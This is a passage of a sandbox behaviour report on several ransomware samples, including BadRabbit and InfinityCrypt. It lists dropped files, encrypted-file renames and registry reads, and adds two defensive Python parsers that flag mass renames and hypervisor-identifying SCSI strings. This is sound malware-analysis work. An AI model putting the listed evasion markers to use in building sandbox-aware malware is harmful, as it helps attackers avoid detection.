File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\msvcp140.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.aff.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-runtime-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\concrt140.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ACE.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\th-TH\bdsubwiz.txtui | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\ui\ltr\commoncss.ui | installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\cs-CZ.txtui | installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-datetime-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-rtlsupport-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\bdnc.ini | installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\es-ES\bdsubwiz.txtui | installer.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentService.exe | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images_2\common\close.svg | installer.exe
File created | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png | winrar-x64-611.exe
File opened for modification | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\hu-HU\productagentui.txtui | installer.exe
File created | C:\Program Files\Bitdefender Agent\26.0.1.231\lang\ru-RU\productagentui.txtui | installer.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-errorhandling-l1-1-0.dll | Installer.exe
File created | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-conio-l1-1-0.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File opened for modification | C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\BucketTesting.dll | Installer.exe
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\adoberfp.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 | Endermanch@InfinityCrypt.exe
File created | C:\Program Files\Bitdefender Agent\redline\bdredline.conf | installer.exe
-
Drops file in Windows directory 27 IoCs
Processes:
DrvInst.exe, DrvInst.exe, pnputil.exe, DrvInst.exe, DrvInst.exe, svchost.exe, pnputil.exe, pnputil.exe, rundll32.exe, svchost.exe, Installer.exe, Endermanch@BadRabbit.exe, LogonUI.exe, pnputil.exe, Endermanch@Krotten.exe
description | ioc | process
File opened for modification | C:\Windows\inf\oem3.inf | DrvInst.exe
File opened for modification | C:\Windows\inf\oem3.inf | DrvInst.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | pnputil.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\inf\oem2.inf | DrvInst.exe
File opened for modification | C:\Windows\inf\oem2.inf | DrvInst.exe
File opened for modification | C:\Windows\inf\oem2.pnf | DrvInst.exe
File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | svchost.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | pnputil.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | pnputil.exe
File created | C:\Windows\inf\oem2.inf | DrvInst.exe
File created | C:\Windows\inf\oem3.inf | DrvInst.exe
File created | C:\Windows\cscc.dat | rundll32.exe
File created | C:\Windows\dispci.exe | rundll32.exe
File opened for modification | C:\Windows\6402.tmp | rundll32.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | svchost.exe
File opened for modification | C:\Windows\security\logs\scecomp.log | Installer.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\Windows\inf\oem3.pnf | DrvInst.exe
File opened for modification | C:\Windows\infpub.dat | rundll32.exe
File created | C:\Windows\infpub.dat | Endermanch@BadRabbit.exe
File created | C:\Windows\rescache\_merged\2229298842\4066884077.pri | LogonUI.exe
File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | svchost.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | pnputil.exe
File opened for modification | C:\Windows\INF\setupapi.dev.log | DrvInst.exe
File opened for modification | C:\WINDOWS\Web | Endermanch@Krotten.exe
-
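Two patterns in the file records above deserve an automated check rather than a visual scan: Endermanch@InfinityCrypt.exe touches one Adobe file after another and every path carries the same 64-hex-digit suffix appended as a new extension, while rundll32.exe and Endermanch@BadRabbit.exe create infpub.dat, dispci.exe and cscc.dat directly in C:\Windows. The following is an added example, not code from the report or from any tool named on it. It parses the report's flattened "File created / File opened for modification ... process" records into fields and runs those two checks; the sample text is a constructed excerpt of records copied from this report, and the suffix length range and the two-file threshold are assumptions.

```python
"""Parse flattened sandbox file records and flag mass-rename and C:\\Windows drops."""
import re
from collections import defaultdict
from typing import NamedTuple

ACTIONS = r"File created|File opened for modification"

# One record is "<action> <path, may contain spaces> <process ending in .exe>"; the next
# record, or the section's closing "-", follows on the same line with no separator.
RECORD_RE = re.compile(
    rf"(?P<action>{ACTIONS})\s+(?P<path>.+?)\s+(?P<process>\S+\.exe)"
    rf"(?=\s+(?:{ACTIONS})|\s*-?\s*$)"
)
# A long hex token appended as a new extension (assumed range: 32 to 64 hex digits).
HEX_SUFFIX_RE = re.compile(r"\.([0-9A-Fa-f]{32,64})$")
# A file directly in C:\Windows, not in any subdirectory.
WINDOWS_ROOT_RE = re.compile(r"^c:\\windows\\[^\\]+$")

# Constructed excerpt: records copied from this report, joined as the report prints them.
SAMPLE_REPORT_EXCERPT = (
    r"File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ACE.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe "
    r"File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe "
    r"File created C:\Program Files\Bitdefender Agent\26.0.1.231\ui\ltr\commoncss.ui installer.exe "
    r"File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentService.exe installer.exe "
    r"File created C:\Windows\cscc.dat rundll32.exe "
    r"File created C:\Windows\dispci.exe rundll32.exe "
    r"File created C:\Windows\infpub.dat Endermanch@BadRabbit.exe "
    r"File opened for modification C:\Windows\INF\setupapi.dev.log pnputil.exe -"
)


class FileRecord(NamedTuple):
    action: str
    path: str
    process: str


def parse_file_records(text):
    """Split the concatenated records into (action, path, process) tuples."""
    return [FileRecord(m["action"], m["path"], m["process"]) for m in RECORD_RE.finditer(text)]


def mass_rename_suspects(records, min_files=2):
    """process -> suffix -> original file names, for suffixes seen on >= min_files files."""
    seen = defaultdict(lambda: defaultdict(set))
    for r in records:
        m = HEX_SUFFIX_RE.search(r.path)
        if m:
            seen[r.process][m.group(1).upper()].add(r.path[: m.start()])
    return {
        proc: {suffix: sorted(files) for suffix, files in by_suffix.items() if len(files) >= min_files}
        for proc, by_suffix in seen.items()
        if any(len(files) >= min_files for files in by_suffix.values())
    }


def windows_root_drops(records):
    """(path, process) for every file created directly in C:\\Windows."""
    return [(r.path, r.process) for r in records
            if r.action == "File created" and WINDOWS_ROOT_RE.match(r.path.lower())]


if __name__ == "__main__":
    recs = parse_file_records(SAMPLE_REPORT_EXCERPT)
    print(f"{len(recs)} records")
    for proc, suffixes in mass_rename_suspects(recs).items():
        for suffix, files in suffixes.items():
            print(f"{proc} appended .{suffix} to {len(files)} files: {files}")
    for path, proc in windows_root_drops(recs):
        print(f"dropped in Windows root: {path} by {proc}")
```

The lazy path match stops at the first token ending in .exe that is followed by another record or the closing "-", which is why a victim file such as arh.exe.EDD6...CF0 is not mistaken for the process column. Run against the full "Drops file in Program Files directory" and "Drops file in Windows directory" sections, the first check yields the encrypting process and its suffix as a single line, and the second isolates the three BadRabbit components from the driver-installation noise around them.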
Launches sc.exe 3 IoCs
sc.exe is the Windows command-line utility for creating, configuring, starting and stopping services.
Processes:
sc.exe, sc.exe, sc.exe
pid | process
4784 | sc.exe
4360 | sc.exe
3208 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exe
pid | pid_target | process | target process
648 | 2324 | WerFault.exe | Endermanch@Xyeta.exe
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments. In this run the readers are pnputil.exe and DrvInst.exe (Windows driver installation) and svchost.exe, not the sample, so this hit is a by-product of the driver installs recorded above rather than evidence of evasion by the sample.
Processes:
pnputil.exesvchost.exeDrvInst.exeDrvInst.exepnputil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom pnputil.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom pnputil.exe Key opened 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom pnputil.exe Key value queried 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe -
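What a process learns from these reads is the vendor and product strings embedded in the device instance paths, and one of them, Ven_Msft&Prod_Virtual_DVD-ROM, is the Hyper-V virtual DVD drive, exactly the kind of token evasive samples test for. The following is an added example, not code from the report or from any tool named on it: it pulls the SCSI device identities out of the logged key paths, flags the ones that name a hypervisor, and counts which process performed the reads so the attribution caveat above can be checked mechanically. The sample records are a constructed excerpt copied from this section, and the marker list is an assumption.

```python
"""Extract SCSI device identities and reading processes from sandbox registry records."""
import re
from collections import Counter

# Device instance path inside an Enum\SCSI key, e.g.
#   ...\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID
# Windows logs the same key in mixed and in upper case, hence IGNORECASE.
SCSI_ID_RE = re.compile(
    r"\\Enum\\SCSI\\(?P<class>[^&\\]+)&Ven_(?P<vendor>[^&\\]+)&Prod_(?P<product>[^&\\]+)"
    r"\\(?P<instance>[^\\\s]+)",
    re.IGNORECASE,
)
# "<operation> <key path> <process>"; SCSI key paths contain no spaces, so \S+ is enough.
READ_RE = re.compile(r"(?P<op>Key opened|Key value queried)\s+(?P<path>\S+)\s+(?P<process>\S+\.exe)")

# Assumed list of substrings that give away a virtual machine in SCSI vendor/product ids.
HYPERVISOR_MARKERS = ("vbox", "vmware", "qemu", "virtual", "virtio", "xen")

# Constructed excerpt: six records copied from this section of the report.
SAMPLE_SCSI_RECORDS = " ".join([
    r"Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe",
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 svchost.exe",
    r"Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe",
    r"Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe",
    r"Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom DrvInst.exe",
    r"Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe",
])


def scsi_devices(text):
    """Unique (class, vendor, product, instance) tuples, upper-cased so the mixed-case
    and upper-case spellings of one key collapse into a single device."""
    found = {
        (m["class"].upper(), m["vendor"].upper(), m["product"].upper(), m["instance"].upper())
        for m in SCSI_ID_RE.finditer(text)
    }
    return sorted(found)


def hypervisor_indicators(devices):
    """Devices whose vendor or product string names a hypervisor."""
    return [d for d in devices
            if any(mark in f"{d[1]} {d[2]}".lower() for mark in HYPERVISOR_MARKERS)]


def readers(text):
    """How many SCSI-key reads each process performed."""
    return Counter(m["process"] for m in READ_RE.finditer(text))


if __name__ == "__main__":
    devs = scsi_devices(SAMPLE_SCSI_RECORDS)
    for d in devs:
        print("device:", d)
    for d in hypervisor_indicators(devs):
        print("hypervisor indicator:", d[1], d[2])
    print("reads per process:", dict(readers(SAMPLE_SCSI_RECORDS)))
```

On the full section the reader count contains only pnputil.exe, DrvInst.exe and svchost.exe, which is the check that separates driver-installation noise from a sample fingerprinting its environment; a sample process appearing in that counter next to a flagged device is the combination worth escalating.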
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments. Of the three readers here, Installer.exe and ProductAgentService.exe are the Bitdefender agent components seen writing under Program Files above; Endermanch@InfinityCrypt.exe is the only one of the dropped malware executables that queries CPU details.
Processes:
Installer.exe, Endermanch@InfinityCrypt.exe, ProductAgentService.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet | Installer.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Endermanch@InfinityCrypt.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Endermanch@InfinityCrypt.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | ProductAgentService.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | ProductAgentService.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Installer.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 17 IoCs
Processes:
chrome.exe, Installer.exe, chrome.exe
description | ioc | process
